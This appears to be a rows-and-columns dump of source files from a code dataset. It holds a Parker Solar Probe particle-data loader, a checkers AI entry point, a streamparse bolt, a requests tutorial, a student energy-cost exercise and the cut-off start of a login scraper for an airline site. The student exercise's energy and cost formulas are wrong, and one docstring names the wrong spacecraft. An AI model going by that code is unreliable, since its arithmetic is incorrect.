seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
35428179764 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import os
import warnings
import cdflib
import numpy as np
import pandas as pd
import sunpy
from packaging.version import Version
from sunpy.net import Fido
from sunpy.net import attrs as a
from sunpy.timeseries import TimeSeries
from seppy.util import resample_df
# Not needed atm as units are skipped in the modified read_cdf
# if hasattr(sunpy, "__version__") and Version(sunpy.__version__) >= Version("5.0.0"):
# from sunpy.io._cdf import read_cdf, _known_units
# else:
# from sunpy.io.cdf import read_cdf, _known_units
def _fillval_nan(data, fillval):
try:
data[data == fillval] = np.nan
except ValueError:
# This happens if we try and assign a NaN to an int type
pass
return data
def _get_cdf_vars(cdf):
# Get list of all the variables in an open CDF file
var_list = []
cdf_info = cdf.cdf_info()
for attr in list(cdf_info.keys()):
if 'variable' in attr.lower() and len(cdf_info[attr]) > 0:
for var in cdf_info[attr]:
var_list += [var]
return var_list
# def _cdf2df_3d_psp(cdf, index_key, dtimeindex=True, ignore=None, include=None):
# """
# Converts a cdf file to a pandas dataframe.
# Note that this only works for 1 dimensional data, other data such as
# distribution functions or pitch angles will not work properly.
# Parameters
# ----------
# cdf : cdf
# Opened CDF file.
# index_key : str
# The CDF key to use as the index in the output DataFrame.
# dtimeindex : bool
# If ``True``, the DataFrame index is parsed as a datetime.
# Default is ``True``.
# ignore : list
# In case a CDF file has columns that are unused / not required, then
# the column names can be passed as a list into the function.
# include : str, list
# If only specific columns of a CDF file are desired, then the column
# names can be passed as a list into the function. Should not be used
# with ``ignore``.
# Returns
# -------
# df : :class:`pandas.DataFrame`
# Data frame with read in data.
# """
# if include is not None:
# if ignore is not None:
# raise ValueError('ignore and include are incompatible keywords')
# if isinstance(include, str):
# include = [include]
# if index_key not in include:
# include.append(index_key)
# # Extract index values
# index_info = cdf.varinq(index_key)
# if index_info['Last_Rec'] == -1:
# warnings.warn(f"No records present in CDF file {cdf.cdf_info()['CDF'].name}")
# return_df = pd.DataFrame()
# else:
# index = cdf.varget(index_key)
# try:
# # If there are multiple indexes, take the first one
# # TODO: this is just plain wrong, there should be a way to get all
# # the indexes out
# index = index[...][:, 0]
# except IndexError:
# pass
# if dtimeindex:
# index = cdflib.epochs.CDFepoch.breakdown(index, to_np=True)
# index_df = pd.DataFrame({'year': index[:, 0],
# 'month': index[:, 1],
# 'day': index[:, 2],
# 'hour': index[:, 3],
# 'minute': index[:, 4],
# 'second': index[:, 5],
# 'ms': index[:, 6],
# })
# # Not all CDFs store pass milliseconds
# try:
# index_df['us'] = index[:, 7]
# index_df['ns'] = index[:, 8]
# except IndexError:
# pass
# index = pd.DatetimeIndex(pd.to_datetime(index_df), name='Time')
# data_dict = {}
# npoints = len(index)
# var_list = _get_cdf_vars(cdf)
# keys = {}
# # Get mapping from each attr to sub-variables
# for cdf_key in var_list:
# if ignore:
# if cdf_key in ignore:
# continue
# elif include:
# if cdf_key not in include:
# continue
# if cdf_key == 'Epoch':
# keys[cdf_key] = 'Time'
# else:
# keys[cdf_key] = cdf_key
# # Remove index key, as we have already used it to create the index
# keys.pop(index_key)
# # Remove keys for data that doesn't have the right shape to load in CDF
# # Mapping of keys to variable data
# vars = {}
# for cdf_key in keys.copy():
# try:
# vars[cdf_key] = cdf.varget(cdf_key)
# except ValueError:
# vars[cdf_key] = ''
# for cdf_key in keys:
# var = vars[cdf_key]
# if type(var) is np.ndarray:
# key_shape = var.shape
# if len(key_shape) == 0 or key_shape[0] != npoints:
# vars.pop(cdf_key)
# else:
# vars.pop(cdf_key)
# # Loop through each key and put data into the dataframe
# for cdf_key in vars:
# df_key = keys[cdf_key]
# # Get fill value for this key
# # First catch string FILLVAL's
# if type(cdf.varattsget(cdf_key)['FILLVAL']) is str:
# fillval = cdf.varattsget(cdf_key)['FILLVAL']
# else:
# try:
# fillval = float(cdf.varattsget(cdf_key)['FILLVAL'])
# except KeyError:
# fillval = np.nan
# if isinstance(df_key, list):
# for i, subkey in enumerate(df_key):
# data = vars[cdf_key][...][:, i]
# data = _fillval_nan(data, fillval)
# data_dict[subkey] = data
# else:
# # If ndims is 1, we just have a single column of data
# # If ndims is 2, have multiple columns of data under same key
# # If ndims is 3, have multiple columns of data under same key, with 2 sub_keys (e.g., energy and pitch-angle)
# key_shape = vars[cdf_key].shape
# ndims = len(key_shape)
# if ndims == 1:
# data = vars[cdf_key][...]
# data = _fillval_nan(data, fillval)
# data_dict[df_key] = data
# elif ndims == 2:
# for i in range(key_shape[1]):
# data = vars[cdf_key][...][:, i]
# data = _fillval_nan(data, fillval)
# data_dict[f'{df_key}_{i}'] = data
# elif ndims == 3:
# for i in range(key_shape[2]):
# for j in range(key_shape[1]):
# data = vars[cdf_key][...][:, j, i]
# data = _fillval_nan(data, fillval)
# data_dict[f'{df_key}_E{i}_P{j}'] = data
# return_df = pd.DataFrame(index=index, data=data_dict)
# return return_df
def psp_isois_load(dataset, startdate, enddate, epilo_channel='F', epilo_threshold=None, path=None, resample=None, all_columns=False):
"""
Downloads CDF files via SunPy/Fido from CDAWeb for CELIAS, EPHIN, ERNE onboard SOHO
Parameters
----------
dataset : {str}
Name of PSP dataset:
- 'PSP_ISOIS-EPIHI_L2-HET-RATES60'
- 'PSP_ISOIS-EPIHI_L2-HET-RATES3600' (higher coverage than 'RATES60' before mid-2021)
- 'PSP_ISOIS-EPIHI_L2-LET1-RATES60' (not yet supported)
- 'PSP_ISOIS-EPIHI_L2-LET2-RATES60' (not yet supported)
- 'PSP_ISOIS-EPILO_L2-PE'
- 'PSP_ISOIS-EPILO_L2-IC'
startdate, enddate : {datetime or str}
Datetime object (e.g., dt.date(2021,12,31) or dt.datetime(2021,4,15)) or "standard"
datetime string (e.g., "2021/04/15") (enddate must always be later than startdate)
epilo_channel : string
'E', 'F', 'G' (for 'EPILO PE'), or 'C', 'D', 'P', 'R', 'T' (for 'EPILO IC').
EPILO chan, by default 'F'
epilo_threshold : {int or float}, optional
Replace ALL flux/countrate values above 'epilo_threshold' with np.nan, by default None.
Only works for Electron count rates in 'PSP_ISOIS-EPILO_L2-PE' dataset
path : {str}, optional
Local path for storing downloaded data, by default None
resample : {str}, optional
resample frequency in format understandable by Pandas, e.g. '1min', by default None
all_columns : {boolean}, optional
Whether to return all columns of the datafile for EPILO (or skip
usually unneeded columns for better performance), by default False
Returns
-------
df : {Pandas dataframe}
See links above for the different datasets for a description of the dataframe columns
energies_dict : {dictionary}
Dictionary containing energy information.
NOTE: For EPIHI energy values are only loaded from the first day of the interval!
For EPILO energy values are the mean of the whole loaded interval.
"""
trange = a.Time(startdate, enddate)
cda_dataset = a.cdaweb.Dataset(dataset)
try:
result = Fido.search(trange, cda_dataset)
filelist = [i[0].split('/')[-1] for i in result.show('URL')[0]]
filelist.sort()
if path is None:
filelist = [sunpy.config.get('downloads', 'download_dir') + os.sep + file for file in filelist]
elif type(path) is str:
filelist = [path + os.sep + f for f in filelist]
downloaded_files = filelist
for i, f in enumerate(filelist):
if os.path.exists(f) and os.path.getsize(f) == 0:
os.remove(f)
if not os.path.exists(f):
downloaded_file = Fido.fetch(result[0][i], path=path, max_conn=1)
# loading for EPIHI
if dataset.split('-')[1] == 'EPIHI_L2':
# downloaded_files = Fido.fetch(result, path=path, max_conn=1)
# downloaded_files.sort()
data = TimeSeries(downloaded_files, concatenate=True)
df = data.to_dataframe()
# df = read_cdf(downloaded_files[0])
# reduce data frame to only H_Flux, H_Uncertainty, Electron_Counts, and Electron_Rate.
# There is no Electron_Uncertainty, maybe one could use at least the Poission error from Electron_Counts for that.
# df = df.filter(like='H_Flux') + df.filter(like='H_Uncertainty') + df.filter(like='Electrons')
if dataset.split('-')[2].upper() == 'HET':
if dataset.split('-')[3] == 'RATES60':
selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
if dataset.split('-')[3] == 'RATES3600':
selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
if dataset.split('-')[2].upper() == 'LET1':
selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
if dataset.split('-')[2].upper() == 'LET2':
selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
df = df[df.columns[df.columns.str.startswith(tuple(selected_cols))]]
cdf = cdflib.CDF(downloaded_files[0])
# remove this (i.e. following line) when sunpy's read_cdf is updated,
# and FILLVAL will be replaced directly, see
# https://github.com/sunpy/sunpy/issues/5908
# df = df.replace(cdf.varattsget('A_H_Flux')['FILLVAL'], np.nan)
# 4 Apr 2023: previous 1 lines removed because they are taken care of with sunpy
# 4.1.0:
# https://docs.sunpy.org/en/stable/whatsnew/changelog.html#id7
# https://github.com/sunpy/sunpy/pull/5956
# get info on energies and units
energies_dict = {"H_ENERGY":
cdf['H_ENERGY'],
"H_ENERGY_DELTAPLUS":
cdf['H_ENERGY_DELTAPLUS'],
"H_ENERGY_DELTAMINUS":
cdf['H_ENERGY_DELTAMINUS'],
"H_ENERGY_LABL":
cdf['H_ENERGY_LABL'],
"H_FLUX_UNITS":
cdf.varattsget('A_H_Flux')['UNITS'],
"Electrons_ENERGY":
cdf['Electrons_ENERGY'],
"Electrons_ENERGY_DELTAPLUS":
cdf['Electrons_ENERGY_DELTAPLUS'],
"Electrons_ENERGY_DELTAMINUS":
cdf['Electrons_ENERGY_DELTAMINUS'],
"Electrons_ENERGY_LABL":
cdf['Electrons_ENERGY_LABL'],
"Electrons_Rate_UNITS":
cdf.varattsget('A_Electrons_Rate')['UNITS']
}
# loading for EPILO
if dataset.split('-')[1] == 'EPILO_L2':
if dataset[-2:] == 'PE':
species_str = 'Electron'
elif dataset[-2:] == 'IC':
species_str = 'H'
if len(downloaded_files) > 0:
if all_columns:
ignore = []
else:
ignore = [f'Epoch_Chan{epilo_channel}_DELTA', f'HCI_Chan{epilo_channel}', f'HCI_Lat_Chan{epilo_channel}', f'HCI_Lon_Chan{epilo_channel}',
f'HCI_R_Chan{epilo_channel}', f'HGC_Lat_Chan{epilo_channel}', f'HGC_Lon_Chan{epilo_channel}', f'HGC_R_Chan{epilo_channel}',
f'{species_str}_Chan{epilo_channel}_Energy_LABL', f'{species_str}_Counts_Chan{epilo_channel}', f'RTN_Chan{epilo_channel}']
#ignore = ['Epoch_ChanP_DELTA', 'HCI_ChanP', 'HCI_Lat_ChanP', 'HCI_Lon_ChanP', 'HCI_R_ChanP', 'HGC_Lat_ChanP', 'HGC_Lon_ChanP', 'HGC_R_ChanP', 'H_ChanP_Energy', 'H_ChanP_Energy_DELTAMINUS', 'H_ChanP_Energy_DELTAPLUS', 'H_ChanP_Energy_LABL', 'H_CountRate_ChanP', 'H_Counts_ChanP', 'H_Flux_ChanP', 'H_Flux_ChanP_DELTA', 'PA_ChanP', 'Quality_Flag_ChanP', 'RTN_ChanP', 'SA_ChanP
# read 0th cdf file
# # cdf = cdflib.CDF(downloaded_files[0])
# # df = _cdf2df_3d_psp(cdf, f"Epoch_Chan{epilo_channel.upper()}", ignore=ignore)
df = _read_cdf_psp(downloaded_files[0], f"Epoch_Chan{epilo_channel.upper()}", ignore_vars=ignore)
# read additional cdf files
if len(downloaded_files) > 1:
for f in downloaded_files[1:]:
# # cdf = cdflib.CDF(f)
# # t_df = _cdf2df_3d_psp(cdf, f"Epoch_Chan{epilo_channel.upper()}", ignore=ignore)
t_df = _read_cdf_psp(f, f"Epoch_Chan{epilo_channel.upper()}", ignore_vars=ignore)
df = pd.concat([df, t_df])
# columns of returned df for EPILO PE
# -----------------------------------
# PA_ChanF_0 to PA_ChanF_7
# SA_ChanF_0 to SA_ChanF_7
# Electron_ChanF_Energy_E0_P0 to Electron_ChanF_Energy_E47_P7
# Electron_ChanF_Energy_DELTAMINUS_E0_P0 to Electron_ChanF_Energy_DELTAMINUS_E47_P7
# Electron_ChanF_Energy_DELTAPLUS_E0_P0 to Electron_ChanF_Energy_DELTAPLUS_E47_P7
# Electron_CountRate_ChanF_E0_P0 to Electron_CountRate_ChanF_E47_P7
energies_dict = {}
for k in [f'{species_str}_Chan{epilo_channel.upper()}_Energy_E',
f'{species_str}_Chan{epilo_channel.upper()}_Energy_DELTAMINUS',
f'{species_str}_Chan{epilo_channel.upper()}_Energy_DELTAPLUS']:
energies_dict[k] = df[df.columns[df.columns.str.startswith(k)]].mean()
df.drop(df.columns[df.columns.str.startswith(k)], axis=1, inplace=True)
# rename energy column (removing trailing '_E')
energies_dict[f'{species_str}_Chan{epilo_channel.upper()}_Energy'] = energies_dict.pop(f'{species_str}_Chan{epilo_channel.upper()}_Energy_E')
# replace outlier data points above given threshold with np.nan
# note: df.where(cond, np.nan) replaces all values where the cond is NOT fullfilled with np.nan
# following Pandas Dataframe work is not too elegant, but works...
if epilo_threshold:
# create new dataframe of FLUX columns only with removed outliers
df2 = df.filter(like='Electron_CountRate_').where(df.filter(like='Electron_CountRate_') <= epilo_threshold, np.nan)
# drop these FLUX columns from original dataframe
flux_cols = df.filter(like='Electron_CountRate_').columns
df.drop(labels=flux_cols, axis=1, inplace=True)
# add cleaned new FLUX columns to original dataframe
df = pd.concat([df2, df], axis=1)
else:
df = ''
energies_dict = ''
if isinstance(resample, str):
df = resample_df(df=df, resample=resample, pos_timestamp="center", origin="start")
except (RuntimeError, IndexError):
print(f'Unable to obtain "{dataset}" data!')
downloaded_files = []
df = pd.DataFrame()
energies_dict = []
return df, energies_dict
def calc_av_en_flux_PSP_EPIHI(df, energies, en_channel, species, instrument, viewing):
"""
This function averages the flux of several energy channels into a combined energy channel
channel numbers counted from 0
So far only works for EPIHI-HET
Parameters
----------
df : pd.DataFrame DataFrame containing HET data
DataFrame containing PSP data
energies : dict
Energy dict returned from psp_loader
en_channel : int or list
energy channel number(s) to be used
species : string
'e', 'electrons', 'p', 'i', 'protons', 'ions'
instrument : string
'het'
viewing : string
'A', 'B'
Returns
-------
pd.DataFrame
flux_out: contains channel-averaged flux
"""
if instrument.lower() == 'het':
if species.lower() in ['e', 'electrons']:
species_str = 'Electrons'
flux_key = 'Electrons_Rate'
if species.lower() in ['p', 'protons', 'i', 'ions', 'h']:
species_str = 'H'
flux_key = 'H_Flux'
en_str = energies[f'{species_str}_ENERGY_LABL']
if type(en_channel) == list:
energy_low = en_str[en_channel[0]][0].split('-')[0]
energy_up = en_str[en_channel[-1]][0].split('-')[-1]
en_channel_string = energy_low + '-' + energy_up
DE = energies[f'{species_str}_ENERGY_DELTAPLUS']+energies[f'{species_str}_ENERGY_DELTAMINUS']
if len(en_channel) > 2:
raise Exception('en_channel must have len 2 or less!')
if len(en_channel) == 2:
try:
df = df[df.columns[df.columns.str.startswith(f'{viewing.upper()}_{flux_key}')]]
except (AttributeError, KeyError):
None
for bins in np.arange(en_channel[0], en_channel[-1]+1):
if bins == en_channel[0]:
I_all = df[f'{viewing.upper()}_{flux_key}_{bins}'] * DE[bins]
else:
I_all = I_all + df[f'{viewing.upper()}_{flux_key}_{bins}'] * DE[bins]
DE_total = np.sum(DE[(en_channel[0]):(en_channel[-1]+1)])
flux_out = pd.DataFrame({'flux': I_all/DE_total}, index=df.index)
else:
en_channel = en_channel[0]
flux_out = pd.DataFrame({'flux': df[f'{viewing.upper()}_{flux_key}_{en_channel}']}, index=df.index)
else:
flux_out = pd.DataFrame({'flux': df[f'{viewing.upper()}_{flux_key}_{en_channel}']}, index=df.index)
en_channel_string = en_str[en_channel][0]
# replace multiple whitespaces with single ones
en_channel_string = ' '.join(en_channel_string.split())
return flux_out, en_channel_string
def calc_av_en_flux_PSP_EPILO(df, en_dict, en_channel, species, mode, chan, viewing):
"""
This function averages the flux of several energy channels (and viewing directions) into a combined energy channel.
channel numbers counted from 0
So far only works for EPILO PE chanF electrons
Parameters
----------
df : pd.DataFrame DataFrame containing HET data
DataFrame containing PSP data
energies : dict
Energy dict returned from psp_loader
en_channel : int or list
energy channel number(s) to be used
species : string
'e', 'electrons'
mode : string
'pe' or 'ic'. EPILO mode
chan : string
'E', 'F', 'G', 'P', 'T'. EPILO chan
viewing : int or list
EPILO viewing. 0 to 7 for electrons; 0 to 79 for ions
(ions 70-79 correspond to electrons 7, i.e., the electron wedges are
split up into 10 viewings for ions)
Returns
-------
pd.DataFrame
flux_out: contains channel-averaged flux
"""
if mode.lower() == 'pe':
if species.lower() in ['e', 'electrons']:
species_str = 'Electron'
flux_key = 'Electron_CountRate'
# if species.lower() in ['p', 'protons', 'i', 'ions', 'h']:
# species_str = 'H'
# flux_key = 'H_Flux'
elif mode.lower() == 'ic':
# if species.lower() in ['e', 'electrons']:
# species_str = 'Electrons'
# flux_key = 'Electrons_Rate'
if species.lower() in ['p', 'protons', 'i', 'ions', 'h']:
species_str = 'H'
flux_key = 'H_Flux'
if type(en_channel) == int:
en_channel = [en_channel]
if type(viewing) == int:
viewing = [viewing]
df_out = pd.DataFrame()
flux_out_all = {}
en_channel_string_all = []
for view in viewing:
if type(en_channel) == list:
# energy = en_dict[f'{species_str}_Chan{chan}_Energy'].filter(like=f'_P{view}').values
energy = en_dict[f'{species_str}_Chan{chan}_Energy'][en_dict[f'{species_str}_Chan{chan}_Energy'].keys().str.endswith(f'_P{view}')].values
# energy_low = energy - en_dict[f'{species_str}_Chan{chan}_Energy_DELTAMINUS'].filter(like=f'_P{view}').values
energy_low = energy - en_dict[f'{species_str}_Chan{chan}_Energy_DELTAMINUS'][en_dict[f'{species_str}_Chan{chan}_Energy_DELTAMINUS'].keys().str.endswith(f'_P{view}')].values
# energy_high = energy + en_dict[f'{species_str}_Chan{chan}_Energy_DELTAPLUS'].filter(like=f'_P{view}').values
energy_high = energy + en_dict[f'{species_str}_Chan{chan}_Energy_DELTAPLUS'][en_dict[f'{species_str}_Chan{chan}_Energy_DELTAPLUS'].keys().str.endswith(f'_P{view}')].values
DE = en_dict[f'{species_str}_Chan{chan}_Energy_DELTAMINUS'].filter(like=f'_P{view}').values + en_dict[f'{species_str}_Chan{chan}_Energy_DELTAPLUS'].filter(like=f'_P{view}').values
# build energy string of combined channel
en_channel_string = np.round(energy_low[en_channel[0]], 1).astype(str) + ' - ' + np.round(energy_high[en_channel[-1]], 1).astype(str) + ' keV'
# select view direction
# df = df.filter(like=f'_P{view}')
if len(en_channel) > 2:
raise Exception("en_channel must have length 2 or less! Define first and last channel to use (don't list all of them)")
if len(en_channel) == 2:
# try:
# df = df[df.columns[df.columns.str.startswith(f'{view.upper()}_{flux_key}')]]
# # df = df[df.columns[df.columns.str.startswith(f'{flux_key}_Chan{chan}_')]]
# except (AttributeError, KeyError):
# None
for bins in np.arange(en_channel[0], en_channel[-1]+1):
if bins == en_channel[0]:
I_all = df[f"{flux_key}_Chan{chan}_E{bins}_P{view}"] * DE[bins]
else:
I_all = I_all + df[f"{flux_key}_Chan{chan}_E{bins}_P{view}"] * DE[bins]
DE_total = np.sum(DE[(en_channel[0]):(en_channel[-1]+1)])
flux_out = pd.DataFrame({f'viewing_{view}': I_all/DE_total}, index=df.index)
if len(en_channel) == 1:
en_channel = en_channel[0]
flux_out = pd.DataFrame({f'viewing_{view}': df[f"{flux_key}_Chan{chan}_E{en_channel}_P{view}"]}, index=df.index)
df_out = pd.concat([df_out, flux_out], axis=1)
# calculate mean of all viewings:
df_out2 = pd.DataFrame({'flux': df_out.mean(axis=1, skipna=True)}, index=df_out.index)
en_channel_string_all.append(en_channel_string)
# check if not all elements of en_channel_string_all are the same:
if len(en_channel_string_all) != en_channel_string_all.count(en_channel_string_all[0]):
print("You are combining viewing directions that have different energies. This is strongly advised against!")
print(en_channel_string_all)
return df_out2, en_channel_string_all[0]
else:
return df_out2, en_channel_string_all[0]
psp_load = copy.copy(psp_isois_load)
"""
Modification of sunpy's read_cdf function to allow skipping of reading variables from a cdf file.
This function is copied from sunpy under the terms of the BSD 2-Clause licence. See licenses/SUNPY_LICENSE.rst
"""
def _read_cdf_psp(fname, index_key, ignore_vars=[]):
"""
Read a CDF file that follows the ISTP/IACG guidelines.
Parameters
----------
fname : path-like
Location of single CDF file to read.
index_key : str
The CDF key to use as the index in the output DataFrame.
For example, index_key='Epoch_ChanP'
ignore_vars : list
In case a CDF file has columns that are unused / not required, then
the column names can be passed as a list into the function.
Returns
-------
DataFrame
A Pandas DataFrame for the time index defined by index_key.
References
----------
Space Physics Guidelines for CDF https://spdf.gsfc.nasa.gov/sp_use_of_cdf.html
"""
import astropy.units as u
from cdflib.epochs import CDFepoch
from sunpy import log
from sunpy.timeseries import GenericTimeSeries
from sunpy.util.exceptions import warn_user
cdf = cdflib.CDF(str(fname))
# Extract the time varying variables
cdf_info = cdf.cdf_info()
meta = cdf.globalattsget()
if hasattr(cdflib, "__version__") and Version(cdflib.__version__) >= Version("1.0.0"):
all_var_keys = cdf_info.rVariables + cdf_info.zVariables
else:
all_var_keys = cdf_info['rVariables'] + cdf_info['zVariables']
var_attrs = {key: cdf.varattsget(key) for key in all_var_keys}
# Get keys that depend on time
var_keys = [var for var in var_attrs if 'DEPEND_0' in var_attrs[var] and var_attrs[var]['DEPEND_0'] is not None]
# # Get unique time index keys
# time_index_keys = sorted(set([var_attrs[var]['DEPEND_0'] for var in var_keys]))
# all_ts = []
# # For each time index, construct a GenericTimeSeries
# for index_key in time_index_keys:
# try:
# index = cdf.varget(index_key)
# except ValueError:
# # Empty index for cdflib >= 0.3.20
# continue
# Only for selected index_key:
index = cdf.varget(index_key)
# TODO: use to_astropy_time() instead here when we drop pandas in timeseries
index = CDFepoch.to_datetime(index)
# df = pd.DataFrame(index=pd.DatetimeIndex(name=index_key, data=index))
units = {}
df_dict = {}
for var_key in var_keys:
if var_key in ignore_vars:
continue # leave for-loop, skipping var_key
attrs = var_attrs[var_key]
# If this variable doesn't depend on this index, continue
if attrs['DEPEND_0'] != index_key:
continue
# Get data
if hasattr(cdflib, "__version__") and Version(cdflib.__version__) >= Version("1.0.0"):
var_last_rec = cdf.varinq(var_key).Last_Rec
else:
var_last_rec = cdf.varinq(var_key)['Last_Rec']
if var_last_rec == -1:
log.debug(f'Skipping {var_key} in {fname} as it has zero elements')
continue
data = cdf.varget(var_key)
# Set fillval values to NaN
# It would be nice to properley mask these values to work with
# non-floating point (ie. int) dtypes, but this is not possible with pandas
if np.issubdtype(data.dtype, np.floating):
data[data == attrs['FILLVAL']] = np.nan
# Skip all units :-(
# # Get units
# if 'UNITS' in attrs:
# unit_str = attrs['UNITS']
# try:
# unit = u.Unit(unit_str)
# except ValueError:
# if unit_str in _known_units:
# unit = _known_units[unit_str]
# else:
# warn_user(f'astropy did not recognize units of "{unit_str}". '
# 'Assigning dimensionless units. '
# 'If you think this unit should not be dimensionless, '
# 'please raise an issue at https://github.com/sunpy/sunpy/issues')
# unit = u.dimensionless_unscaled
# else:
# warn_user(f'No units provided for variable "{var_key}". '
# 'Assigning dimensionless units.')
# unit = u.dimensionless_unscaled
if data.ndim > 3:
# Skip data with dimensions >= 3 and give user warning
warn_user(f'The variable "{var_key}" has been skipped because it has more than 3 dimensions, which is unsupported.')
elif data.ndim == 3:
# Multiple columns, give each column a unique label.
for j in range(data.T.shape[0]):
for i, col in enumerate(data.T[j, :, :]):
# var_key_mod = var_key+'_E'+str(j).rjust(2, '0')
var_key_mod = var_key+f'_E{j}'
# df[var_key_mod + '_P'+str(i).rjust(2, '0')] = col
df_dict[var_key_mod + f'_P{i}'] = col
# units[var_key_mod + f'_{i}'] = unit
elif data.ndim == 2:
# Multiple columns, give each column a unique label
for i, col in enumerate(data.T):
df_dict[var_key + f'_{i}'] = col
# units[var_key + f'_{i}'] = unit
else:
# Single column
df_dict[var_key] = data
# units[var_key] = unit
df = pd.DataFrame(df_dict, index=pd.DatetimeIndex(name=index_key, data=index))
# all_ts.append(GenericTimeSeries(data=df, units=units, meta=meta))
# if not len(all_ts):
if not len(df):
log.debug(f'No data found in file {fname}')
return df # all_ts
| serpentine-h2020/SEPpy | seppy/loader/psp.py | psp.py | py | 31,552 | python | en | code | 5 | github-code | 13 |
28614597959 |
import math
water_heat_capacity=4.186
electricity_price=8.9
kilowatth_hour=2777*math.e**-7
vol=float(input('Ingrese cantidad de agua:'))
temperature=float(input('Ingrese tempreatura: '))
q=vol*temperature*water_heat_capacity
print('Se requieren %d joules de energia' %q)
kwh=q+kilowatth_hour
costo=kwh+electricity_price
print('Costo de energia: %.2f' %costo)
| Lusarom/progAvanzada | ejercicio17.py | ejercicio17.py | py | 367 | python | en | code | 1 | github-code | 13 |
28880445475 | from checkers.constants import WIDTH, HEIGHT, SQUARE_SIZE, BLACK, DARK_BEIGE, WHITE
from checkers.game import Game
from minimax.minimax import minimax
from minimax.alpha_beta import alpha_beta
from monte_carlo.monte_carlo_tree_search import monte_carlo_tree_search
import pygame
FPS = 60
WINDOW = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('Checkers')
global nodes
def get_row_col_from_mouse(pos):
x, y = pos
row = y // SQUARE_SIZE
col = x // SQUARE_SIZE
return row, col
def main():
run = True
pygame.font.init()
clock = pygame.time.Clock()
game = Game(WINDOW)
font = pygame.font.Font('freesansbold.ttf', 20)
neg_inf = float('-inf')
pos_inf = float('inf')
while run:
clock.tick(FPS)
depth = 6
if game.turn == WHITE:
#value, new_board = minimax(game.get_board(), depth, True, game, 2, WHITE, BLACK)
#new_board = monte_carlo_tree_search(game.get_board(), True, WHITE, game, 10, 1, 6)
value, new_board = alpha_beta(game.get_board(), depth, True, game, 2, WHITE, BLACK, neg_inf, pos_inf)
if new_board:
game.ai_move(new_board)
else:
print("WINNER: BLACK")
game.update()
break
game.update()
game.change_turn()
# if game.turn == BLACK:
# value, new_board = minimax(game.get_board(), depth, True, game, 2, BLACK, WHITE)
#value, new_board = alpha_beta(game.get_board(), depth, True, game, 3, BLACK, WHITE, neg_inf, pos_inf)
# if new_board:
# game.ai_move(new_board)
# else:
# print("WINNER: WHITE")
# game.update()
# break
# game.update()
# game.change_turn()
if game.winner():
print("WINNER: ")
print(("BLACK" if game.winner() == BLACK else "WHITE"))
game.update()
break
text = font.render(("Black" if game.turn == BLACK else "White"), True, DARK_BEIGE)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
row, col = get_row_col_from_mouse(pos)
game.select(row, col)
game.update()
WINDOW.blit(text, (10, 10))
game.update()
pygame.time.delay(10)
pygame.time.delay(10000)
pygame.quit()
if __name__ == '__main__':
main()
| mh022396/Checkers-AI | src/main.py | main.py | py | 2,616 | python | en | code | 0 | github-code | 13 |
33259281187 | """Take a document that has a key values: list<int> and add the following keys
* total: the sum of all the values
* count: how many values
"""
import copy
import random
from streamparse import bolt
class SummariseBolt(bolt.Bolt):
auto_ack = False
def process(self, tup):
self.log(u"Received: {0}".format(tup))
if random.choice([1, 2, 3, 4]) == 1:
# This is to simulate a failure that we should retry. E.g. a host
# being temporarily down etc.
self.log(u"Failing: {0}".format(tup))
self.fail(tup)
return
document = tup.values[0]
self.log(u"Summarising: {0}".format(document))
if not document.get("values"):
# This is a failure from which we can not recover. So we don't
# fail it, we just log and continue.
self.log(u"Bad Document! No values")
else:
document_with_summary = summarise(document)
next_tuple = (document_with_summary, )
self.log(u"Done with original tuple: {0}".format(tup.id))
self.emit(next_tuple)
self.ack(tup)
def summarise(original_document):
"""Summarises a document by totaling and counting the values.
>>> summarise({"values": [1, 2, 3]})
{'count': 3, 'total': 6, 'values': [1, 2, 3]}
"""
document = copy.deepcopy(original_document)
values = document["values"]
document["total"] = sum(values)
document["count"] = len(values)
return document
| sujaymansingh/sparse_average | src/summarise.py | summarise.py | py | 1,517 | python | en | code | 1 | github-code | 13 |
36026572854 | """
main transfer protocol used in the web
Javascript object Notation (JSON): an object converted to string
similar to dictionary in Python
1. client prepares request
2. client sends HTTP request
3. Server recieves request and looks for data
4. Server sends back response
.get()
.post()
basics of https requests
"""
# import module
import requests
# send request
r = requests.get(
"https://opentdb.com/api.php?amount=5&category=13&difficulty=easy&type=multiple"
)
# get status code
print(r.status_code)
# print request
r.text
# check type
type(r.text)
# import json module
import json
# create variable to use method of json.loads to convert string to dictionary
question = json.loads(r.text)
# check type
type(r.text)
# print object in readable way (install in CLI first)
import pprint
pprint.pprint(question)
# grab specific values
question["results"][2]["category"]
| triggxl/Python3 | 04-requests.py | 04-requests.py | py | 877 | python | en | code | 0 | github-code | 13 |
19214605660 | import requests
import dict_users
import time
from bs4 import BeautifulSoup
import pytz
from datetime import datetime, timedelta
import exception_logger
current_datetime = time.strftime('%d.%m.%Y %H:%M')
dt_utc_arrive = datetime.strptime(current_datetime, '%d.%m.%Y %H:%M').replace(tzinfo=pytz.utc)
dt_minus_4h = dt_utc_arrive.astimezone(pytz.utc) - timedelta(hours=4)
day = dt_minus_4h.strftime('%d')
month = dt_minus_4h.strftime('%m')
year = dt_minus_4h.strftime('%Y')
hour = dt_minus_4h.strftime('%H')
minute = dt_minus_4h.strftime('%M')
current_dt_minus_4h = f'{day}.{month} {hour}:{minute}'
def parser(): # это надо было все обернуть в функцию чтобы потом при импорте вызвать модуль.функция()
url = 'https://edu.rossiya-airlines.com/ops/viewLineOps-1/'
s = requests.Session()
data = {
